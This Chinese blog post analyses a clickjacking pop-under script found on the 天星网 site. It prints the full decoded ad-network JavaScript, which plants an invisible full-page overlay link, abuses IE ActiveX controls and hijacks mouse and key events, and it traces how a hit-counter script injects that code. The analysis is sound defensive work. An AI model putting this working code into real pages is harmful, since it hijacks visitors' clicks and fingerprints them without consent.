
天星网ClickJacking点击劫持分析

2015-01-20 11:42 来源: 编辑:admin
刚好打开这个站，发现第一次点击会弹窗，之后就不会了；清除一下 COOKIE，又会继续弹。查看源代码，也没什么奇葩的。   http://www.lxting.com/script/popup/v1_min.js   最终锁定到这个 JS 脚本，解密后的代码如下：
// Decoded pop-under / clickjacking payload (v1_min.js) as captured by the article.
// All configuration comes from globals the loader snippet further down the page defines:
//   ytpp_url  - landing URL to open
//   ytpp_sti  - settings string in "KEY:value;KEY:value;" form (parsed by getp)
//   ytpp_plid - placement id
//   ytpp_ads  - maximum number of pops per visitor (tracked in a cookie)
// Defender notes: the observable DOM artifact is a full-viewport <a target="_blank"> with
// opacity 0 and z-index 2147483647 inserted as the first child of <body> (see a_pop and the
// rendered markup quoted at the end of the article). The whole chain is only reachable because
// the site embeds a third-party counter script via document.write; a script-src allow-list
// (CSP) that excludes that host, or simply not embedding it, cuts the chain at its root.
(function() { 
    var aa_url = window.ytpp_url; // landing URL (set by the loader as ytpp_url) 
    var ua = navigator.userAgent; 
    var form_div = document.createElement('div'); // hidden container used by form_pop 
    var form_pd = 0; // set to 1 once the form_pop path has submitted; a_pop then removes its overlay 
    // User-agent sniffing; pop() picks a technique per browser family from these flags. 
    var browser = { 
        ie: /msie/i.test(ua), 
        ie6: /msie 6/i.test(ua), 
        ie7: /msie 7/i.test(ua), 
        ie8: /msie 8/i.test(ua), 
        ie9: /msie 9/i.test(ua), 
        360 : /360se/i.test(ua), 
        sogou: /;?se.+?MetaSr/i.test(ua), 
        maxthon: /Maxthon/i.test(ua), 
        tt: /TencentTraveler/i.test(ua), 
        ff: /firefox/i.test(ua), 
        webkit: /AppleWebKit/i.test(ua), 
        opera: /Opera/i.test(ua), 
        qqbrowser: /QQBrowser/i.test(ua), 
        cr: /chrome/i.test(ua), 
        gg: window.chrome, 
        theworld: /Theworld/i.test(ua) 
    }; 
    // Settings parsed from ytpp_sti in init(). Values stay strings; later comparisons rely on coercion. 
    var _setting = ""; 
    var _ct = 0;   // CT: cookie lifetime in minutes; negative means "at most once per cookie lifetime" 
    var _le = 0;   // LE: intended start delay in seconds (see the bug noted in fstart) 
    var _pd = 1;   // never read from settings; stays 1 unless PCO/POO resets it 
    var _pd2 = 0;  // PD2: probability threshold for a second pop() 
    var _pc = 1;   // never read from settings and never used 
    var _pc2 = 1;  // PC2: probability threshold for the a_pop overlay 
    var _pco = 0;  // PCO: overlay-only mode 
    var _pta = 0;  // PT / PT2..PT10: "delaySeconds,probability" pairs for delayed pops 
    var _ptb = 0; 
    var _pt2a = 0; 
    var _pt2b = 0; 
    var _pt3a = 0; 
    var _pt3b = 0; 
    var _pt4a = 0; 
    var _pt4b = 0; 
    var _pt5a = 0; 
    var _pt5b = 0; 
    var _pt6a = 0; 
    var _pt6b = 0; 
    var _pt7a = 0; 
    var _pt7b = 0; 
    var _pt8a = 0; 
    var _pt8b = 0; 
    var _pt9a = 0; 
    var _pt9b = 0; 
    var _pt10a = 0; 
    var _pt10b = 0; 
    var _po = 0;   // PO: probability threshold for a direct window.open 
    var _poo = 0;  // POO: window.open-only mode 
    var ckn, ckt;  // cookie name and lifetime (minutes) chosen in fstart 
    var ads = 0;   // pops shown so far for this visitor (persisted in the cookie) 
    // Read cookie `w`; returns "" when absent. Plain indexOf, so a cookie whose name merely
    // ends with `w` (e.g. "XYITIAN_NUM") would also match. 
    function b(w) { 
        var s = w + "="; 
        var r = ""; 
        var o = 0; 
        var d = 0; 
        var p = document.cookie; 
        if (document.cookie.length > 0) { 
            o = document.cookie.indexOf(s); 
            if (o != -1) { 
                o += s.length; 
                d = document.cookie.indexOf(";", o); 
                if (d == -1) d = document.cookie.length; 
                r = unescape(document.cookie.substring(o, d)) 
            } 
        } 
        return r 
    }; 
    // Write cookie `w`=`v` expiring in `p` minutes (default 30 when unparsable). The parameter
    // `p` shadows the function name inside the body; parseFloat never throws, so the try is inert. 
    function p(w, p, v) { 
        var t = 30; 
        try { 
            t = parseFloat(p) * 1 
        } catch(e) { 
            t = 30 
        } 
        if (isNaN(t)) t = 30; 
        var then = new Date(); 
        then.setTime(then.getTime() + t * 60 * 1000); 
        document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
    }; 
    // Parse the ytpp_sti settings string into the module variables above. Note that PD and PC
    // are never looked up, so "PD:1;PC:1" in the captured settings has no effect here. 
    function init() { 
        _setting = ytpp_sti; 
        if (getp(_setting, "CT")) { 
            _ct = getp(_setting, "CT") 
        } 
        if (getp(_setting, "LE")) { 
            _le = getp(_setting, "LE") 
        } 
        if (getp(_setting, "PD2")) { 
            _pd2 = getp(_setting, "PD2") 
        } 
        if (getp(_setting, "PC2")) { 
            _pc2 = getp(_setting, "PC2") 
        } 
        if (getp(_setting, "PCO")) { 
            _pco = getp(_setting, "PCO") 
        } 
        // PT, PT2..PT10 hold "seconds,probability"; eval is used only to address _ptNa/_ptNb by name. 
        for (var i = 1; i <= 10; i++) { 
            var n = i == 1 ? "": i; 
            if (getp(_setting, "PT" + n)) { 
                eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); 
                eval("_pt" + n + "a = _pt" + n + "[0];"); 
                eval("_pt" + n + "b = _pt" + n + "[1];") 
            } 
        } 
        if (getp(_setting, "PO")) { 
            _po = getp(_setting, "PO") 
        } 
        if (getp(_setting, "POO")) { 
            _poo = getp(_setting, "POO") 
        } 
        // PCO / POO are exclusive single-technique modes: POO wins, and every other trigger is zeroed. 
        if (_pco == 1 || _poo == 1) { 
            if (_poo == 1) { 
                _pco = 0 
            } else { 
                _poo = 0 
            } 
            _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; 
            for (var i = 2; i <= 10; i++) { 
                eval("_pt" + i + "a = _pt" + i + "b = 0;") 
            } 
        } 
    }; 
    // Return the value between "p:" and the next ";" in settings string s, or undefined if absent. 
    function getp(s, p) { 
        var i = s.indexOf(p + ":"); 
        if (i >= 0) { 
            return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) 
        } 
    }; 
    // Add (act undefined) or remove (act given) listener `func` for `event` on `e`, with the IE attachEvent form. 
    function event(e, event, func, act) { 
        if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); 
        else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) 
    } 
    // Per-browser dispatch: tries a silent technique first and falls back to the user-gesture
    // hijacks (a_pop overlay / click_pop). `param` is accepted but never used. 
    function pop(url, param) { 
        if (!document.body) { 
            return setTimeout(function() { 
                pop(url, param) 
            }, 
            13) 
        } 
        try { 
            if (browser['cr'] && browser['gg']) { 
                try { 
                    hrefopen(url) 
                } catch(e) { 
                    a_pop(url) 
                } 
            } else if (browser['webkit'] && browser['maxthon']) { 
                if (!func(url)) { 
                    try { 
                        form_pop(url); 
                        a_pop(url) 
                    } catch(e) {} 
                } 
            } else if (browser['tt']) { 
                try { 
                    object_pop(url) 
                } catch(e) { 
                    a_pop(url) 
                } 
            } else if (browser['sogou']) { 
                if (!func(url)) { 
                    try { 
                        a_pop(url) 
                    } catch(e) {} 
                } 
            } else if (browser['webkit'] && browser['qqbrowser']) { 
                if (!func(url)) { 
                    try { 
                        form_pop(url) 
                    } catch(e) { 
                        click_pop(url) 
                    } 
                } 
            } else if (browser['webkit'] || browser['opera']) { 
                try { 
                    form_pop(url); 
                    a_pop(url) 
                } catch(e) {} 
            } else if (browser['theworld'] && browser.ie6) { 
                if (!object_pop2(url)) { 
                    a_pop(url) 
                } 
            } else if (browser['theworld'] && browser.ie8) { 
                if (!func(url)) { 
                    try { 
                        object_pop(url) 
                    } catch(e) { 
                        click_pop(url) 
                    } 
                } 
            } else if (browser.ie6) { 
                if (!func(url)) { 
                    object_pop2(url) 
                } 
            } else if (browser.ie8) { 
                if (!func(url)) { 
                    try { 
                        object_pop(url) 
                    } catch(e) { 
                        document.onclick = function() { 
                            func(url); 
                            document.onclick = null 
                        } 
                    } 
                } 
            } else if (browser['ie']) { 
                try { 
                    object_pop(url) 
                } catch(e) { 
                    click_pop(url) 
                } 
            } else if (browser['ff']) { 
                if (!func(url)) { 
                    click_pop(url) 
                } 
            } else { 
                if (!func(url)) { 
                    click_pop(url) 
                } 
            } 
        } catch(e) { 
            if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { 
                click_pop(url) 
            } else { 
                a_pop(url) 
            } 
        } 
    } 
    // IE path: inserts a 1x1 ActiveX <object> (by CLSID) and calls its launchURL(url); counts the pop. 
    function object_pop(url, param) { 
        var object = document.createElement('object'); 
        object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); 
        object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 
        append(object); 
        object.launchURL(url); 
        ads++; 
        p(ckn, ckt, ads) 
    } 
    // IE6 path: a second ActiveX control whose DOM.Script.open is used as a window.open substitute.
    // The property walk with a no-op callback presumably forces the control to initialise (unconfirmed). 
    function object_pop2(url, param) { 
        var object2 = document.createElement('object'); 
        object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); 
        object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 
        append(object2); 
        for (var i in object2) { 
            try { (function(o) {})(object2[i]) 
            } catch(e) {} 
        } 
        setTimeout(function() { 
            object2.DOM.Script.open(url, '_blank', '') 
        }, 
        500); 
        ads++; 
        p(ckn, ckt, ads) 
    } 
    // Insert e as the first child of the first <body> element (the for-in over {body:1} just yields "body"). 
    function append(e) { 
        for (var t in { 
            body: 1 
        }) { 
            var ele = document.getElementsByTagName(t); 
            for (var i = 0; i < ele.length; i++) { 
                ele[i].insertBefore(e, ele[i].firstChild); 
                return
            } 
        } 
    } 
    // Chrome path: dispatch a synthetic click on a hidden <a target="_blank">; true on success, false on any error. 
    function hrefopen(url) { 
        try { 
            var c = document.createElement("a"); 
            c.setAttribute("href", url); 
            c.setAttribute("target", "_blank"); 
            c.setAttribute("style", "display:none;"); 
            var b = document.createEvent("MouseEvents"); 
            b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null); 
            c.dispatchEvent(b); 
            ads++; 
            p(ckn, ckt, ads); 
            return true 
        } catch(q) { 
            return false 
        } 
    } 
    // Hidden POST form targeting a new window. The action is aa_url, not the `url` argument (which is unused).
    // If clicking the hidden submit throws, the submit is deferred to the next keyup anywhere on the page. 
    function form_pop(url) { 
        form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 
        form_div.setAttribute('style', 'display:none'); 
        var form = document.createElement('form'); 
        form.setAttribute('action', aa_url); 
        form.setAttribute('method', 'post'); 
        form.setAttribute('name', '__unionsky_push_d_form_box__'); 
        form.setAttribute('target', '_blank'); 
        form.setAttribute('style', 'display:none'); 
        var sinput = document.createElement('input'); 
        sinput.setAttribute('style', 'display:none'); 
        sinput.setAttribute('type', 'submit'); 
        sinput.setAttribute('id', '_sumit_2app'); 
        form.appendChild(sinput); 
        form_div.appendChild(form); 
        append(form_div); 
        var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; 
        try { 
            document.getElementById("_sumit_2app").click() 
        } catch(e) { 
            event(document, 'keyup', 
            function(e) { 
                if (document.getElementById('__unionsky_push_d_object_box__') == null) { 
                    return
                }; 
                e = e || window.event; 
                e.canceBubble = true; // misspelled (cancelBubble), so this line has no effect 
                event(document, 'keyup', arguments.callee, true); // one-shot: detach self 
                form_pd = 1; 
                unionsky_from.submit() 
            }) 
        } 
    }; 
    // Hijack the next mouseup anywhere in the document to call window.open (via func) once. 
    function click_pop(url, param) { 
        event(document, 'mouseup', 
        function(e) { 
            e = e || window.event; 
            e.canceBubble = true; // misspelled (cancelBubble), so this line has no effect 
            event(document, 'mouseup', arguments.callee, true); 
            func(url, param); 
            ads++; 
            p(ckn, ckt, ads) 
        }) 
    }; 
    // The clickjacking overlay proper: an invisible, viewport-sized <a target="_blank"> pinned at the
    // top-most z-index so the visitor's first click anywhere opens `url` in a new tab. A 120 ms interval
    // keeps it on top and sized to the viewport (on IE it also demotes any other node already at the
    // maximum z-index). The anchor removes itself 200 ms after the click, or at once if form_pop already fired.
    // This is exactly the element quoted in the rendered markup at the end of the article. 
    function a_pop(url) { 
        if (ytpp_plid == 166028) { // one specific placement id is exempted from the overlay 
            return
        } 
        if (!document.body) { 
            return setTimeout(function() { 
                a_pop(url) 
            }, 
            13) 
        } 
        var a = document.createElement("a"); 
        a.href = url; 
        a.target = "_blank"; 
        var div = document.createElement('div'); 
        div.style.backgroundColor = '#fff'; 
        a.appendChild(div); 
        append(a); 
        var as = a.style; 
        as.position = "absolute"; 
        as.zIndex = '2147483647'; 
        as.display = "block"; 
        as.top = "0px"; 
        as.left = "0px"; 
        as.cursor = 'default'; 
        as.opacity = "0"; 
        as.filter = "alpha(opacity:0)"; 
        var m = setInterval(function() { 
            if (form_pd == 1) { 
                a.parentNode.removeChild(a); 
                clearInterval(m); 
                return
            } 
            a.style.zIndex = '2147483647'; 
            var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; 
            a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; 
            div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px'; 
            div.style.height = d.clientHeight + 'px'; 
            if (browser['ie']) { 
                try { 
                    var divs = document.body.childNodes; 
                    for (var i = 0; i < divs.length; i++) { 
                        if (!divs[i]['style']) { 
                            continue
                        } 
                        var _i = parseInt(divs[i].style.zIndex); 
                        if (_i && divs[i] != a && _i == 2147483647) { 
                            divs[i].style.zIndex = _i - 1 
                        } 
                    } 
                    a.style.zIndex = '2147483647'
                } catch(e) {} 
            } 
        }, 
        120); 
        a.onclick = function(e) { 
            if (document.getElementById('__unionsky_push_d_object_box__') != null) { 
                form_div.parentNode.removeChild(form_div) 
            } 
            e = e || window.event; 
            e.cancelBubble = true; // spelled correctly here, unlike in form_pop / click_pop 
            setTimeout(function() { 
                a.parentNode.removeChild(a) 
            }, 
            200); 
            clearInterval(m); 
            ads++; 
            p(ckn, ckt, ads) 
        }; 
        event(a, 'mouseup', 
        function(e) { 
            e = e || window.event; 
            e.cancelBubble = true 
        }) 
    } 
    // window.open wrapper; "open" is assembled from char codes to dodge naive string matching.
    // Returns the new window handle (falsy when blocked) and counts a pop only on success. 
    function func(url, param) { 
        var f = window[String.fromCharCode(111, 112, 101, 110)]; 
        var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); 
        if (w) { 
            ads++; 
            p(ckn, ckt, ads) 
        }; 
        return w 
    } 
    // Entry point. Chooses the frequency-cap cookie from CT: CT >= 0 uses YITIAN_NUM (cap at ytpp_ads pops),
    // CT < 0 uses YITIAN_ALL (at most one pop while the cookie lives, |CT| minutes). With the captured
    // "CT:-3" this is why the article saw one pop per visit and a fresh pop after clearing cookies. 
    function fstart(url) { 
        init(); 
        if (_ct >= 0) { 
            ckn = "YITIAN_NUM"; 
            ckt = _ct 
        } else { 
            ckn = "YITIAN_ALL"; 
            ckt = Math.abs(_ct) 
        } 
        if (ckt > 0) { 
            if (b(ckn)) { 
                try { 
                    ads = parseFloat(b(ckn)) 
                } catch(q) {} 
            } 
        } 
        if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 
            return
        } else { 
            if (_le > 0) { 
                // Bug: go(url) is invoked immediately and its undefined result is what gets scheduled,
                // so the LE delay never actually applies. 
                setTimeout(go(url), _le * 1000) 
            } else { 
                go(url) 
            } 
        } 
    } 
    // Schedule every enabled technique. Probabilities are compared against Math.random(), so a value
    // of 1 always fires; PT entries fire pop() after their configured number of seconds (+300 ms). 
    function go(url) { 
        if (_poo == 1) { 
            try { 
                func(url) 
            } catch(q) {} 
        } else if (_pco == 1) { 
            a_pop(url) 
        } else { 
            if (_pd == 1) { 
                setTimeout(function() { 
                    pop(url, { 
                        a: 1, 
                        b: 2 
                    }) 
                }, 
                300) 
            } 
            if (_pd2 > Math.random()) { 
                setTimeout(function() { 
                    pop(url, { 
                        a: 1, 
                        b: 2 
                    }) 
                }, 
                300) 
            } 
            for (var i = 1; i <= 10; i++) { 
                var n = i == 1 ? "": i; 
                if (eval("_pt" + n + "b") > Math.random()) { 
                    setTimeout(function() { 
                        setTimeout(function() { 
                            pop(url, { 
                                a: 1, 
                                b: 2 
                            }) 
                        }, 
                        300) 
                    }, 
                    parseInt(eval("_pt" + n + "a")) * 1000) 
                } 
            } 
            if (_pc2 > Math.random()) { 
                a_pop(url) 
            } 
            if (_po > Math.random()) { 
                try { 
                    func(url) 
                } catch(q) {} 
            } 
        } 
    }; 
    fstart(aa_url); 
    // No-op beforeunload handler; registered but does nothing. 
    event(window, 'beforeunload', 
    function() {}) 
})();


通过浏览器抓包发现，URL 从这里产生：   http://play.unionsky.cn/show/?placeid=141830   直接打开看不到什么东西；http://www.unionsky.cn/ 是这个广告联盟的站点。我们直接分析抓包到的内容：
// Loader served by the ad network for placement 141830 (captured by the article). It collects
// visitor fingerprint fields, defines the ytpp_* globals that the popup script above reads, and
// then injects two more third-party scripts via document.write. 
// Referrer is URL-encoded twice and truncated to 1000 characters before being sent upstream. 
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer)); 
ytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r; 
var ytpp_u = encodeURIComponent(navigator.userAgent); 
var ytpp_s = window.screen.width + "*" + window.screen.height; 
var ytpp_l = navigator.browserLanguage || navigator.language; // browserLanguage is the legacy IE name 
var ytpp_plid = 141830; // placement id (compared against 166028 in a_pop) 
var ytpp_w = 0; 
var ytpp_h = 0; 
// Landing URL opened by the popup script; carries referrer, UA, screen size, language and a cache-buster. 
var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random(); 
var ytpp_ads = 14; // per-visitor cap used by fstart (only reached when CT >= 0) 
// Settings string parsed by init(): CT:-3 => one pop per 3-minute cookie; PC2:1 => overlay always;
// PT:60,1 / PT2:100,1 => additional pop() attempts 60 s and 100 s after load. PD and PC are ignored by the script. 
var ytpp_sti = 'CT:-3;PD:1;PC:1;PC2:1;PT:60,1;PT2:100,1;'; 
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>"); 
// Loads the popup payload decoded above. 
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");

 

那么这个 http://play.unionsky.cn/show/?placeid=141830 又是从哪里被引用进去的呢？继续分析，发现在这里：   http://txsite.21tx.com/count/count.js
// count.js, the site-side hit counter that turns out to be the root of the chain: besides its own
// stats beacon it document.write()s the ad-network placement script at the very end. All txcount_*
// names are assigned without var and therefore become implicit globals. 
txcount_uid = 1; 
txcount_uh = 0; 
txcount_uw = 0; 
txcount_uah = 0; 
txcount_uaw = 0; 
txcount_ucd = 0; 
  
if (window.screen) { 
  txcount_uh = window.screen.height; 
  txcount_uw = window.screen.width; 
  txcount_uah = window.screen.availHeight; 
  txcount_uaw = window.screen.availWidth; 
  txcount_ucd = window.screen.colorDepth; 
} 
  
  
// Stats beacon URL; txsite_pagekey is not defined in this file (presumably set by the embedding page).
// escape() is the legacy encoder and does not cover all characters a URL or referrer may contain. 
var url = "http://txsite.21tx.com/count/count.aspx"; 
url = url + "?u="+ txcount_uid; 
//url = url + "&f=" + txcount_f; 
url = url + "&k=" + txsite_pagekey; 
//url = url + "&t=" + txcount_t; 
url = url + "&l=" + escape(document.location); 
url = url + "&r=" + escape(document.referrer); 
url = url + "&uh=" + txcount_uh; 
url = url + "&uw=" + txcount_uw; 
url = url + "&uah=" + txcount_uah; 
url = url + "&uaw=" + txcount_uaw; 
url = url + "&ucd=" + txcount_ucd; 
  
  
// Note the unquoted src attribute: the URL is written straight into markup. 
document.write("<script src=" + url + "><\/script>"); 
//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>'); 
  
document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>'); 
  
  
// This is the injection point: the counter pulls in the ad-network placement, which in turn loads
// the popup/clickjacking payload. Removing this line (or restricting script-src) breaks the chain. 
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");

 

一切昭然若揭了。代码产生的直接效果如下：    <a href="http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&amp;r=&amp;u=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F27.0.1453.116%20Safari%2F537.36&amp;s=1920*1080&amp;l=zh-CN&amp;n=0.27341766096651554" target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a>    很隐蔽的一段"好"代码。